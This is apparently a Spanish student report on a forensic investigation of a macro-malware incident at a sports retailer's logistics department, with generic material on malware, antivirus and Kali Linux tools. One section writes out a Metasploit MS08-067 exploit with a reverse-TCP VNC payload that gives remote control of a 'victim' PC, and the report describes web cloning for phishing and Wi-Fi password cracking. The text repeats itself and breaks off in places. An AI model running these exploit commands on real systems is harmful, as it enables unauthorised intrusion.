Beruflich Dokumente
Kultur Dokumente
Actividad Nº2
Tema Propuesto:
LA EMPRESA MARATHON SPORTS TUVO UN INCIDENTE EN LA
LOGÍSTICA DE RECEPCIÓN DE EMBARQUES A CAUSA DE UN
MALWARE QUE AFECTO A LA BASE DE DATOS E INFORMACION.
Contenido
LA EMPRESA MARATHON SPORTS TUVO UN INCIDENTE EN LA LOGÍSTICA DE RECEPCIÓN DE
EMBARQUES A CAUSA DE UN MALWARE QUE AFECTO A LA BASE DE DATOS E
INFORMACION. ............................................................................................................................. 3
1. METODOLOGÍA DE LA INFORMÁTICA FORENSE ................................................ 3
1.1. Delitos Informáticos ..................................................................................................... 3
1.2. Tipos de Incidentes ....................................................................................................... 3
1.3. Evidencia Digital ........................................................................................................... 4
1.4. ¿Qué significa la evidencia? ......................................................................................... 4
1.5. Análisis Forense Informático ........................................................................................ 4
1.5.1. Adquisición de Datos: ........................................................................................... 4
1.5.2. Análisis de Investigación: ..................................................................................... 5
1.5.3. Redacción del Informe:......................................................................................... 5
1.5.3.1. Informe ejecutivo: ............................................................................................ 5
1.5.3.2. Informe Técnico: ............................................................................................... 6
2. TÉCNICAS DE LA INFORMÁTICA FORENSE .......................................................... 6
2.2. Programa: ..................................................................................................................... 6
2.2.1. Técnicas de Hacking: ............................................................................................. 6
2.2.1.1. Descripción: ...................................................................................................... 6
2.2.1.2. Ejemplo con Xploits (explotar vulnerabilidades de Windows): ...................... 6
2.2.2. Herramientas usadas por los Atacantes: ............................................................. 7
2.2.3. Análisis: ................................................................................................................. 7
2.2.4. Herramientas para los administradores: ............................................................. 7
3. DESCRIPCION DEL MALWARE QUE AFECTO A LA BASE DE DATOS E
INFORMACION 7
3.1. Malware: ....................................................................................................................... 7
3.2. Tipos de Malware: ........................................................................................................ 8
4. MEDIOS POR DONDE INGRESA EL MALWARE ................................................. 10
5. VULNERABILIDADES DE LA RED ........................................................................ 15
5.1. TIPOS DE INTRUSO...................................................................................................... 16
6. METODOLOGIA DE LA NIST` ............................................................................. 17
7. TECNICAS DE SOFTWARE PARA UN ANALISIS FORENSE .................................. 17
8. ANTIVIRUS ......................................................................................................... 17
8.1. Cómo Funcionan?: ...................................................................................................... 18
8.2. Tipos de Antivirus: ...................................................................................................... 18
9. SOFTWARE UTILIZADO KALI LINUX .................................................................. 19
9.1. Que es Software?: ...................................................................................................... 19
9.2. Software Kali Linux: .................................................................................................... 19
9.3. Distribuciones y herramientas que incluye Kali Linux: ............................................. 20
9.4. Herramientas necesarias para tareas específicas. .................................................... 20
9.5. Uso de Herramienta NBTSCAN:.................................................................................. 23
El jueves 8 y Viernes 9 de Febrero del 2018 la Empresa Marathon Sports presentó un incidente
en la logística de recepción de Embarques, ya que aquellos Contenedores que llegaron al Centro
de Distribución no tenían fechas asignadas y autorización de arribo como a su vez la información
respectiva para el descargue, causando malestar a las Empresas de las Marcas Mayoristas
(MEDEPORT: ADIDAS, EQUINOX: NIKE) por la demora de procesos en su mercadería.
El análisis forense informático se aplica una vez que tenemos un incidente y queremos investigar
qué fue los que pasó, quien fue y como fue.
En el caso de los ficheros del sistema analizado, hay que tener cuidado con las
carpetas personales de los usuarios. Dichas carpetas están ubicadas en el directorio
/home en sistemas GNU/Linux y en c:\documents and settings\ en sistemas
Windows con tecnología NT (Windows 2000, XP, etc.).
Hay que tener en cuenta que no se consideran personales aquellas carpetas que
han sido creadas por defecto en la instalación del sistema operativo, por ejemplo,
las cuentas de administrador. De todas formas, siempre es recomendable
asesorarse con un jurista ante la realización de un análisis forense para prevenir
posibles situaciones desagradables (por ejemplo: ser nosotros los denunciados por
incumplir la legislación).
La redacción del informe es una tarea ardua a la par que compleja, porque no sólo
hay que recoger todas las evidencias, indicios y pruebas recabados sino que,
además, hay que explicarlos de una manera clara y sencilla. Hay que tener n cuenta
que muchas veces dichos informes van a ser leídos por personas sin conocimientos
técnicos y obviamente tiene que ser igual de riguroso y debe ser entendido, con lo
que habrá que explicar minuciosamente cada punto.
Los principales lectores de los informes ejecutivos son la alta dirección de las
empresas, organismos, etc.; es decir, personas que no tienen un perfil técnico.
Por tanto, el lenguaje del informe no debe ser muy técnico y, si se utiliza alguna
jerga técnica, tiene que ser explicada de una manera clara.
o Introducción: se describe el objeto del informe así como el coste del incidente
acaecido.
o Descripción: se detalla que ha pasado en el sistema de una manera clara y
concisa sin entrar en cuestiones muy técnicas. Hay que pensar que dicho
informe será leído por personal sin conocimientos técnicos o con muy escasos
conocimientos.
o Recomendaciones: se describen las acciones que se deben realizar una vez
comprobado que se ha sufrido una incidencia para evitar otra incidencia del
mismo tipo, así como si debe ser denunciado.
En este tipo de informe sus principales lectores son personas con un perfil
técnico (ingenieros, técnicos superiores, etc.), siendo el objetivo del informe
describir qué ha ocurrido en el sistema. El informe debe contener al menos los
siguientes puntos:
2.2. Programa:
2.2.1. Técnicas de Hacking:
o Vulnerabilidades, búsqueda, análisis y explotación.
o Herramientas de seguridad.
2.2.1.1. Descripción:
Linux:
Código:
sudo nmap -sS -O 192.168.1.0-255
-sS --> Escaneamos de forma silenciosa
-O --> Para que nos muestre el Sistema Operativo
Windows:
o Código:
net view
Aparte de esto aconsejo también el uso de la herramienta Colasoft MAC
Scanner para el escaneo de pc's conectadas a la red.
Una vez que conocemos las ip's y sus respectivos Sistemas Operativos, para
utilizar el primer exploits vamos a intentar localizar algún Windows XP
(Recomendable que para ver si el pc está conectado hagamos ping a su ip)
o Código:
use windows/smb/ms08_067_netapi
set RHOST (ip equipo remoto)
set payload windows/vncinject/reverse_tcp
set LHOST (ip equipo nuestro)
exploit Se nos abrirá una pantalla remota con el pc víctima.
2.2.3. Análisis:
o Cómo actuar ante un ataque.
o Notas legales.
o Análisis de huellas y localización de información en Windows y UNIX
o Análisis de logs.
Troyano: El troyano tiene algunas semejanzas con los virus informáticos, pero su
funcionamiento no es exactamente el mismo. Mientras que un virus suele ser
destructivo, un troyano trata de pasar desadvertido mientras accede a tu dispositivo con
la intención de ejecutar acciones ocultas con las que abrir una puerta trasera para que
otros programas maliciosos puedan acceder a él.
Sin embargo, uno de los puntos en común entre varios tipos de malware es que los
troyanos también llegarán a ti disfrazados de archivos legítimos. Lo harán con
ejecutables que aparentemente no harán nada malo al ser utilizados, pero que
enseguida empezarán a trabajar a tus espaldas sin que te des cuenta.
Spyware: Se trata de otro tipo de programa que se instala en tu equipo por sí sólo o
mediante la interacción de una segunda aplicación que lo lanza sin que te des
cuenta. Suelen trabajar a escondidas tratando de ocultar su rastro para que no levantes
la guardia y actúes con normalidad.
Por lo general, este tipo de software suele instalarse en programas que después se
difunden gratuitamente como una fuente de ingresos para sus creadores. La razón por
la que algunas personas los consideran spyware, es porque algunos de ellos pueden
recolectar y enviar tus datos personales.
Se trata de una de las amenazas que más está creciendo en los últimos años, por lo que
es importante tener tu ordenador siempre actualizado y seguir una serie de
precauciones a la hora de enfrentarte a correos electrónicos o mensajes sospechosos,
evitando siempre instalar nada que te manden por correo personas que no conozcas.
El miércoles 7 de Febrero del 2018 a las 17:30 el malware se alojó en el computador de Logística
donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.
Archivos afectados:
- Base de datos (archivo Excel macros) contenía las Fechas, Empresa, Nombres de Embarques,
Línea del producto, Cantidades, Distribuciones, Numero de Orden y documentación extra para
proceder con la asignación y autorización de llegada al CD.
Aceptar las solicitudes que se presentan en anuncios o ventanas emergentes y que indican
que tu ordenador está infectado o que necesita un antivirus único. Este tipo de
indicaciones suelen aparecer al instalar o actualizar un tercer programa, y se sugiere que
si instalas algo desde Internet, debe ser de manera personalizada para asegurar que no
se agregue ningún virus o programa malicioso durante el proceso.
Asegúrate de descargar el software que necesites para tí o para tu negocio desde una
fuente confiable y ejecútalo
Cualquier Red abierta, disco duro, o memoria USB conectado al ordenador personal o de
empresa puede contener diferentes tipos de virus. Es una táctica común de los hackers
obtener acceso a una red mediante una serie de códigos presentes en una unidad
pendrive, y son capaces de infectar todo el sistema con un virus o un troyano.
Visitando enlaces desconocidos corremos el peligro de acabar en un sitio web que podría
acceder a tu ordenador mediante archivos maliciosos u obtener todo tipo de información
sobre nuestro sistema. Abre con cuidado aquellos chats, correos electrónicos o SMS que
resulten sospechosos, ten cuidado incluso con las URL que parecen legítimas y
comprueba toda la información a la que hacen referencia.
Ejecutar las actualizaciones más recientes también debe hacerse de forma razonable,
tratando con cautela especialmente aquellas asociadas a Microsoft Windows u
orientadas a la seguridad. Mantén siempre actualizado el sistema operativo, los
programas y los complementos de tu navegador que igualmente pueden ser vulnerables.
Ejecuta herramientas que sirvan para comprobar los complementos instalados y sus
versiones.
Detalle Gráfico del Malware que pudo haber ingresado al Computador (PC de LOGISTICA) de
la EMPRESA MARATHON SPORTS:
El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística
donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.
Archivos afectados:
El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística
donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.
Los Jefes del CD no tenían el Informe General para analizar el espacio de recepción en el CD y
autorizar la llegada de los Embarques.
El Área de descarga no tenía los informes para cuadrar los Embarques y reportar los faltantes y
sobrantes si existiesen.
El Área de logística buscaba alternativas para realizar nuevos informes en otras computadoras
que no se encuentren infectadas del virus macro.
5. VULNERABILIDADES DE LA RED
o Spammer: Son los artífices del envío de miles de mensajes de correo electrónico
no solicitado mediante redes como puede ser internet, provocando una
sobrecarga en los servidores de correo y colapso en los buzones de correo.
o Amenazas del Personal Interno: Este tipo de ataques los realiza el propio
personal de la organización o red, mediante accesos a ciertas partes de la red
con propósitos de curiosidad pero con el riesgo de poder alterar datos en caso
de acceso consumado. Hay que tener en cuenta también a los exempleados
El NIST fue fundado en 1901 como una agencia federal que forma parte del Departamento de
Comercio de los Estados Unidos. Su misión es elaborar y promover patrones de la medición, los
estándares y la tecnología con el fin de crear productividad, facilitar el comercio y mejorar la
calidad de vida.
Este instituto lleva a cabo un proyecto para el testeo de herramientas de análisis forense de
ordenadores (computer forensic tool testing, CFTT).
Existe actualmente en el mercado, una amplia diversidad de productos software para forense
digital. Algunas son herramientas genéricas las cuales proporcionan una variedad de funciones.
Otras son más enfocadas en servir a un propósito más limitado. Estas aplicaciones tienden a
enfocarse en un tipo muy específico de evidencia, por ejemplo correo electrónico o Internet.
Cuando se selecciona software, la elección necesita ser hecha entre ir con herramientas open
source o productos comerciales. Existen ventajas y desventajas en ambos. Factores como el
costo, funcionalidad, capacidades, y soporte son algunos de los criterios a ser utilizados para
hacer esta decisión
8. ANTIVIRUS
Los antivirus son programas cuyo objetivo es detectar o eliminar virus informáticos. Con el
transcurso del tiempo, la aparición de sistemas operativos más avanzados e internet, los
antivirus han evolucionado hacia programas más avanzados que además de buscar y detectar
virus informáticos consiguen bloquearlos, desinfectar archivos y prevenir una infección de los
mismos. Actualmente son capaces de reconocer otros tipos de malware como spyware,
gusanos, troyanos, rootkits, etc.
Los antivirus actuales cuentan con vacunas específicas para decenas de miles de plagas
virtuales conocidas, y gracias al modo con que monitorizan el sistema consiguen
detectar y eliminar los virus, worms y trojans antes que ellos infecten el sistema.
El antivirus debe ser actualizado frecuentemente, pues con tantos códigos maliciosos
siendo descubiertos todos los días, los productos pueden hacerse obsoletos
rápidamente. Algunos antivirus pueden ser configurados para que se actualicen
automáticamente. En este caso, es aconsejable que esta opción esté habilitada.
Norton Internet Security: Es el mejor para la seguridad al navegar por internet. Una de
sus principales características es la detección de 'malware', la cual se basa en el análisis
de su comportamiento como una amenaza.
Kaspersky Internet Security: Provee de una adecuada seguridad a los usuarios mientras
se encuentran conectados y desconectados de internet. Tiene un gran desempeño en la
detección de 'malware'.
PC Tool Internet Security: A pesar de que se han hecho muchas mejoras a través de los
años, aún tiene deficiencias. Carece de términos de control para padres y de una opción
de ayuda en línea.
BitDefender Internet Security: Provee de una fuerte protección a sus usuarios. A pesar
de su alta capacidad para identificar y eliminar amenazas, aún sigue dejando rastros en
su trabajo, lo cual le resta efectividad.
Alwil Avast Internet Security: Posee muy buenas funciones para la seguridad en
internet. Su capacidad disminuye al momento de detectar nuevas amenazas. No
contiene algunas funciones vitales.
McAfee Internet Security: Tiene gráficos únicos y actualizados que lo hacen mejor que
los demás. Es intuitivo pero la desventaja frente al resto es que vuelve más lento el
desempeño del sistema.
Panda Internet Security: Provee de todas las funciones básicas de seguridad. Es muy
seguro con los dispositivos USB conectados a la PC y nos da la posibilidad de tener 2Gb
de backup en línea.
Trend Micro Internet Security: Está totalmente equipado con seguridad para el
escritorio de la PC. La desventaja está en el precio y en su pobre desempeño al momento
de detectar 'malware'.
Su principal objetivo es poner a disposición del usuario, las mejores herramientas para
trabajar la auditoría en internet y contar con un potente sistema de
seguridad informática ante los peligros que puedan existir.
Una ventaja que proporciona el GNU/Linux a tu pc, es que te permite adaptarlo para conseguir
las herramientas necesarias adaptadas a las tareas específicas que queremos realizar. Partiendo
de las aplicaciones o software más generalista (como un navegador web o un visor de imágenes)
podemos ir personalizando el sistema con las aplicaciones que necesitemos para realizar
auditorías informáticas, pentest o tests de intrusión como (Zenmap, Nmao, Oswap ZAP,
Armitage,Aircrack-ng., etc).
De esta forma, en Linux encontrarás distros con opciones tan variadas como reproducir música,
visualizar archivos multimedia, o redactar documentos. Todas estas funciones estarán a tu
alcance, sin necesidad de descargar ningún software adicional en tu ordenador.
También existen distros especializadas según campos temáticos. Por ejemplo, en cuanto a la
seguridad informática, encontramos el programa Kali Linux que te ofrece distintas herramientas
para auditar tu sistema operativo y protegerle ante posibles ataques de hackers profesionales.
Sólo en este ámbito, podemos encontrar más de 300 aplicaciones que se encargan de velar por
la seguridad a través del sistema Kali Linux. Entre todas las que existen, cabe destacar Nmap que
controla los puertos de acceso a la red.
Podemos cambiar la dirección física de nuestro adaptador de red por ejemplo para
saltarnos el filtrado MAC de un router o dispositivo en concreto, posee multiples
opciones como crear direcciones random o elegir la MAC según la marca que fabricó el
dispositivo, entre algunas otras.
Sin embargo, cabe destacar que para utilizarlo debemos configurar previamente algunos
parámetros en su archivo de configuración, como la dirección del proxy o proxies que
queremos utilizar.
Por ejemplo:
Para ver una lista completa de la sintaxis y los modificadores que la herramienta admite:
~$ nmap –help
- HTTRACK: Es un clonador de páginas web que nos permitirá copiar todo el código de
un sitio web. Desde la perspectiva de un test de penetración, se utiliza principalmente
para suplantar la identidad de un sitio real, y crear lo que se denomina un phising en
un servidor atacante. Para ejecutar la herramienta basta con teclear en nuestro
terminal $ httrack
Una vez lanzado, el asistente nos solicitará algunos datos como el nombre del proyecto,
su ruta base, el destino de la url y la configuración del proxy.
- Aircrack-ng: Es una de las mejores herramientas inalámbricas para hackear contraseñas
para el craqueo WEP/WAP/WPA2 utilizado en todo el mundo.
Funciona al tomar paquetes de la red, lo analiza a través de contraseñas recuperadas.
También posee una interfaz de consola. Además de esto, Aircrack-ng también utiliza el
ataque estándar de FMS (Fluhrer, Mantin y Shamir) junto con algunas optimizaciones
como los ataques KoreK y el ataque PTW para acelerar el ataque, que es más rápido que
el WEP.
- SMBMap: Es una herramienta que nos permitirá enumerar recursos compartidos samba
a lo largo de un dominio. Y no sólo eso, enumera contenidos y permisos, soporta pass-
the-hash, descarga/sube/borra ficheros, busca patrones de nombres de fichero con la
opción de auto descargarlos e incluso ejecuta comandos en remoto.
- NBTSCAN:
Busca en la red nodos que tengan el servicio NetBios activado y muestra información
de ellos (por ejemplo el Nombre, IP, MAC, etc). Es similar al programa ipscan pero en
modo consola.
nbtscan nbtscan 192.168.1.0-6 busca en el rango establecido (de la .1 a la .6) nodos
con el protocolo NetBios activado.
# nbtscan 192.168.1.0-6
------------------------------------------------------------------------------
# nbtscan -v 192.168.1.0-6
----------------------------------------
---------------------------------------
El miércoles 7 de Febrero del 2018 a las 17:30 el virus se alojó en el computador de Logística
donde se encontraba la información necesaria de los Embarques próximos Arribar al CD.
Los Jefes del CD no tenían el Informe General para analizar el espacio de recepción en el CD y
autorizar la llegada de los Embarques.
El Área de descarga no tenía los informes para cuadrar los Embarques y reportar los faltantes y
sobrantes si existiesen.
El Área de logística buscaba alternativas para realizar nuevos informes en otras computadoras
que no se encuentren infectadas del virus macro.
Los encargados que realizan tareas en el Área de Logística estaban conformados por las
siguientes personas:
Revisando los procesos se identifica que el Sr. Eddy es la persona la encargada de la Logística e
información de los Embarques que llegan al CD, el cual nos comenta que su equipo cumplía con
las todas los normativas de seguridad y cualquier cambio en el sistema, actualización o
instalación de software se solicita autorización del Encargado de Área ya que él tenía Clave de
ADMINISTARADOR para realizar cualquier proceso, por tal motivo podemos asegurar que el
daño fue causado por un INTRUSO.
-El atacante Ingresa al PC1 con nombre de Usuario y Contraseña para establecer una conexión y
compartir las carpetas que van a ser infectadas.
-El atacante desactiva el ANTIVIRUS y el FIREWALL
-El atacante en su PC2 ingresa a las Carpetas Compartidas y procede a copiar el VIRUS MACRO
INSTALACION DEL VIRUS POR PARTE DEL INTRUSO: